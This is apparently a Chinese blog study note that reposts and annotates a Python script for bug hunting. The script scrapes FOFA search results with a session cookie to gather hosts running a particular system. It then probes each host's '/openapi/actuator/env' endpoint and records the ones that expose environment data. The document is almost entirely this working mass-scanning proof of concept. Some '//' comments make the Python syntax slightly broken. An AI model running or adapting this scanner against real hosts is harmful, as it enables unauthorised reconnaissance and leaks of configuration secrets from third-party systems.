结合fofa爬取ip段, 再进行 批量的poc 验证
本文为学习笔记,侵删
详细解释参考文章:
https://wenku.baidu.com/view/4c8c5fa2ef3a87c24028915f804d2b160b4e86f8.html
代码:
代码来源:https://chiza.gitee.io/2022/02/28/%E8%AE%B0%E4%B8%80%E6%AC%A1edusrc%E7%9A%84%E6%8C%96%E6%8E%98/
这里对一些地方进行注释方便理解
import requests
import base64
from lxml import etree
import time
//fofa搜索的内容
search_data='"****系统"'
//fofa 的key
headers={
'cookie':'fofa.cookie',
}
//1.爬取fofa的ip保存到ip.txt
for Page_number in range(1,3):
url='https://fofa.info/result?page='+str(Page_number)+'&qbase64='
search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
urls=url+search_data_bs
#print(urls)
try:
print('正在爬取第' + str(Page_number) + '页')
result=requests.get(urls,headers=headers).content.decode('utf-8')
#print(result)
soup = etree.HTML(result)
ip_data=soup.xpath('//a[@target="_blank"]/@href')
ipdata='\n'.join(ip_data)
print(ip_data)
with open(r'ip.txt', 'a+') as f:
f.write(ipdata+'\n')
f.close()
time.sleep(0.5)
except Exception as e:
pass
//2.下面是poc的编写
payload='/openapi/actuator/env'
//打开遍历的ip.txt
for ip in open('ip.txt'):
//防止\n(换行符)也一起读出来
ip=ip.replace('\n','')
new_url=ip+payload
#print(new_url)
try:
//向网站发起请求,并获取响应对象
result=requests.get(new_url).content.decode('utf-8')
//响应码
code=requests.get(new_url).status_code
print("check_ip->"+ip)
//这个'ac*'应该是成功的特征
if 'activeProfiles' in result and code==200:
print(('\033[31m存在漏洞的URL->'),new_url)
print('\033[0m')
//打开result.txt文件写入存在漏洞的地址
with open(r'result.txt','a+') as f:
f.write(ip+'\n')
f.close()
time.sleep(0.5)
except Exception as e:
pass